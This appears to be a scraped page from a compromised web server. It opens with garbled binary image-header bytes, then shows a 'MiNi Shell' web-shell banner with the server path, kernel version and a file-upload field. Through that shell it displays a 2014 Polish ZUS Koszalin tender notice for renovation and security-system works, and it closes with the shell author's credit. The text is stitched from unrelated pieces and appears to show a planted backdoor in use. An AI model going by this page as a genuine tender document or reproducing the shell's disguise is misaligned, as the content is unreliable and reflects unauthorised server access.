JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140701/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140701/218826-N-2014.html

<p class="kh_header"><b>Koszalin: Roboty bydowlane w zakresie robót remontowych w budynku Oddziału ZUS w Koszalinie i budynkach podległych Inspektoratów w Bialogardzie i Świdwinie.
Zadanie nr 1 - Oddział ZUS w Koszalinie, ul. Fałata 30;
Zadanie nr 2 - Inspektorat ZUS w Białogardzie, ul. Wojska Polskiego 56;
Zadanie nr 3 - Oddział ZUS w Koszalinie, ul. Fałata 30;
Zadanie nr 4 - Inspektorat ZUS w Świdwinie, ul. Wojska Polskiego 1.</b><br>
<b>Numer ogłoszenia: 218826 - 2014; data zamieszczenia: 01.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Koszalinie , ul. Juliana Fałata 30, 75-950 Koszalin, woj. zachodniopomorskie, tel. 94 3485500, 3485965, faks 94 3425262.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty bydowlane w zakresie robót remontowych w budynku Oddziału ZUS w Koszalinie i budynkach podległych Inspektoratów w Bialogardzie i Świdwinie.
Zadanie nr 1 - Oddział ZUS w Koszalinie, ul. Fałata 30;
Zadanie nr 2 - Inspektorat ZUS w Białogardzie, ul. Wojska Polskiego 56;
Zadanie nr 3 - Oddział ZUS w Koszalinie, ul. Fałata 30;
Zadanie nr 4 - Inspektorat ZUS w Świdwinie, ul. Wojska Polskiego 1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie robót modernizacyjnych i remontowych w budynku Oddziału ZUS w Koszalinie i budynkach podległych Inspektoratów w Białogardzie i Świdwinie.Przedmiot zamówienia został podzielony na cztery zadania:Zadanie nr 1 - Oddział ZUS w Koszalinie, ul. Fałata 30;
rozbudowa instalacji pożarowej o dodatkowe sygnalizatory akustyczno - optyczne na korytarzach I, II, III piętra i optyczne z brzęczykiem w pomieszczeniach, w których występują drzwi dymoszczelne E130 i podłączenie ich do istniejącego systemu ppoż. BMZ Integral; rozbudowa instalacji kontroli dostępu SKD do archiwum zakładowego w pomieszczeniu 03 i 010 w piwnicy i podłączeniu do istniejącego systemu SKD Unikard; wymiana monitorów LCD 19. w systemie CCTV w ilości 4 szt.Zadanie nr 2 - Inspektorat ZUS w Białogardzie, ul. Wojska Polskiego 56;rozbudowa sieci strukturalnej w kat. 6UTP o 22 punkty elektryczno - logiczne (1PEL gniazda logiczne, 3 gniazda elektryczne typu DATA) w wyznaczonych pomieszczeniach, które będą służyły do podłączenia drukarek sieciowych i dodatkowych stacji roboczych; wykonaniu podglądu z kamer ze stanowiska ochrony na parterze do pomieszczenia na I piętrze, w którym należy zamontować monitor LCD 19.Zadanie nr 3 - Oddział ZUS w Koszalinie, ul. Fałata 30;
dwukrotne malowanie farbami lateksowymi w kolorze starych tynków wewnętrznych ścian w ilości 11 248,11 m2 i sufitów w ilości 2 763,14 m2  w kolorze białym; malowanie farbami olejnymi w kolorze starych tynków wewnętrznych w ilości 924,32 m2 wraz z robotami towarzyszącymi; zmycie i malowanie lakierem ścian parteru pokrytych tynkiem kamyczkowym typu MARMOLIT w ilości 336,06 m2, naprawa istniejących tynków w pomieszczeniach biurowych i naprawa istniejących tynków kamyczkowych typu MARMOLIT; wymiana uszkodzonych płyt istniejącego sufitu podwieszanego typu ECOPFON; wymiana istniejących uszkodzonych regulowanych ościeżnic drzwiowych typu PORTA w kolorze zgodnym z istniejącą stolarką drzwiową, w ilości 24 szt.; wymiana istniejących drzwi stalowych na aluminiowe i drzwi drewnianych na stalowe; wymiana uszkodzonych parapetów na parapety z konglomeratu w ilości 100,6 mb; wymiana uszkodzonych płytek ściennych i podłogowych wraz z robotami towarzyszącymi.Zadanie nr 4 - Inspektorat ZUS w Świdwinie, ul. Wojska Polskiego 1;
wymiana stolarki drzwiowej zewnętrznej aluminiowej na rozsuwane automatycznie z naświetleniem o wymiarach 185x265 cm w ilości 2 szt. wraz z obróbką ościeży, podłączeniem elektrycznym oraz robotami towarzyszącymi; wymiana drzwi drewnianych na stalowe pełne o wymiarach 110x205 cm w ilości 1 szt. wraz z obróbką ościeży.Zakres robót należy wykonać zgodnie z dokumentacją i uproszczoną dokumentacją, z opisem przedmiotu zamówienia, specyfikacją techniczną wykonania i odbioru robót, rysunkami. Szczegółowy zakres prac do wykonania zawierają przedmiary robót, stanowiące załączniki do SIWZ. Termin płatności 30 dni od dostarczenia faktury do siedziby zamawiającego.
Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonane roboty na co najmniej 36 miesięcy, licząc od daty podpisania przez strony, bez zastrzeżeń, protokołu odbioru robót. Prace muszą być prowadzone  z uwzględnieniem normalnej pracy Oddziału i Inspektoratów.Wykonawca, którego oferta zostanie wybrana może wykonać całość robót własnymi siłami lub powierzyć do wykonania określone części zamówienia podwykonawcom.Szczegółowe warunki realizacji zamówienia zostały zawarte we wzorze umowy stanowiącym załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).Jest to zamówienie o wartości mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.21.00-8, 45.31.11.00-1, 45.31.43.00-4, 42.96.11.00-1, 45.31.43.50-1, 45.31.43.10-7, 45.31.51.00-9, 45.44.21.00-8, 45.41.00.00-4, 45.42.11.31-1, 45.43.21.00-5, 45.42.11.10-8, 90.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał się w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonaniem robót budowlanych o porównywalnym charakterze do przedmiotu zamówienia, o wartości każdej roboty z osobna co najmniej 20 000 zł z VAT (dotyczy zakresu robót przewidzianych dla zadania nr 1, 2, 4) oraz 100 000 zł           z VAT (dotyczy zakresu robót przewidzianych dla zadania nr 3).
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  ( zał. nr 2), wykazu robót (zał. nr 6)  oraz dokumentu potwierdzającego wykonanie wykazanych robót.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, która będzie uczestniczyć                w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub tożsame uprawnienia wydane na podstawie wcześniej obowiązujących przepisów (Zadanie 3 i 4) oraz uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                       i elektroenergetycznych (Zadanie 1 i 2) w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2010r. Nr 243, poz.1623 ze zm.).
Warunek posiadania uprawnień budowlanych, o których mowa wyżej, nie ma zastosowania do obywateli państw członkowskich, którzy nabyli kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające zakresem uprawnieniom budowlanym pozwalającym na pełnienie odpowiedniej funkcji w zakresie objętym umową, oraz posiadających odpowiednią decyzję o uznaniu kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga , aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia. 
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia ( zał. nr 2 i nr 7).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- kosztorys ofertowy sporządzony wg załączonych przedmiarów robót.
- oświadczenie o posiadaniu ubezpieczenia OC od prowadzonej działalności (wzór zał. nr. 7)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego w Koszalinie, ul. Fałata 30, pok. 333 lub pocztą - na wcześniejszy wniosek wykonawcy - fax 94 348 12 33. SIWZ jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 11:00, miejsce: siedziba zamawiającego w Koszalinie, ul. Fałata 30, pokój 021, parter. Godziny pracy pokoju nr 021: poniedziałek - piątek w godzinach 8.00-15.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest współfinansowane ze środków Unii Europejskiej. Nie przewiduje się unieważnienia postępowania o udzielenie zamówienia w przypadku nieprzyznania środków  z Unii Europejskiej, EFTA. Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja i rozbudowa systemu sygnalizacji pożaru SSP i SKD do archiwum zakładowego w Oddziale ZUS w Koszalinie, ul. Fałata 30..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rozbudowa instalacji pożarowej o dodatkowe sygnalizatory akustyczno - optyczne na korytarzach I, II, III piętra i optyczne z brzęczykiem w pomieszczeniach,    w których występują drzwi dymoszczelne E130 i podłączenie ich do istniejącego systemu ppoż. BMZ Integral; rozbudowa instalacji kontroli dostępu SKD do archiwum zakładowego w pomieszczeniu 03 i 010 w piwnicy i podłączeniu do istniejącego systemu SKD Unikard; wymiana monitorów LCD 19 w systemie CCTV w ilości 4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.21.00-8, 45.31.11.00-1, 45.31.43.00-4, 42.96.11.00-1, 45.31.43.50-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozbudowa sieci strukturalnej w Inspektoracie ZUS w Białogardzie, ul. Wojska Polskiego 56..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> rozbudowa sieci strukturalnej w kat. 6UTP o 22 punkty elektryczno - logiczne (1PEL gniazda logiczne, 3 gniazda elektryczne typu DATA) w wyznaczonych pomieszczeniach, które będą służyły do podłączenia drukarek sieciowych i dodatkowych stacji roboczych; wykonaniu podglądu z kamer ze stanowiska ochrony na parterze do pomieszczenia na I piętrze, w którym należy zamontować monitor LCD 19..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.11.00-1, 45.31.43.10-7, 45.31.51.00-9, 45.31.43.50-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Malowanie pomieszczeń, wymiana uszkodzonych ościeznic drzwiowych wraz z drobnymi pracami remontowymi w Oddziale ZUS w Koszalinie, ul. Fałata 30..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dwukrotne malowanie farbami lateksowymi w kolorze starych tynków wewnętrznych ścian w ilości 11 248,11 m2 i sufitów w ilości 2 763,14 m2  w kolorze białym; malowanie farbami olejnymi w kolorze starych tynków wewnętrznych w ilości 924,32 m2 wraz z robotami towarzyszącymi; zmycie i malowanie lakierem ścian parteru pokrytych tynkiem kamyczkowym typu MARMOLIT w ilości 336,06 m2, naprawa istniejących tynków w pomieszczeniach biurowych i naprawa istniejących tynków kamyczkowych typu MARMOLIT; wymiana uszkodzonych płyt istniejącego sufitu podwieszanego typu ECOPFON; wymiana istniejących uszkodzonych regulowanych ościeżnic drzwiowych typu PORTA w kolorze zgodnym z istniejącą stolarką drzwiową, w ilości 24 szt.; wymiana istniejących drzwi stalowych na aluminiowe i drzwi drewnianych na stalowe; wymiana uszkodzonych parapetów na parapety z konglomeratu w ilości 100,6 mb; wymiana uszkodzonych płytek ściennych i podłogowych wraz z robotami towarzyszącymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.41.00.00-4, 45.42.11.31-1, 45.43.21.00-5, 45.42.11.10-8, 90.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wymiana stolarki drzwiowej zewnętrznej w Inspektoracie ZUS w Świdwinie, ul. Wojska Polskiego 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wymiana stolarki drzwiowej zewnętrznej aluminiowej na rozsuwane automatycznie z naświetleniem o wymiarach 185x265 cm w ilości 2 szt. wraz z obróbką ościeży, podłączeniem elektrycznym oraz robotami towarzyszącymi; wymiana drzwi drewnianych na stalowe pełne o wymiarach 110x205 cm w ilości 1 szt. wraz z obróbką ościeży.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.41.00.00-4, 45.42.11.31-1, 45.42.11.10-8, 45.31.11.00-1, 90.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com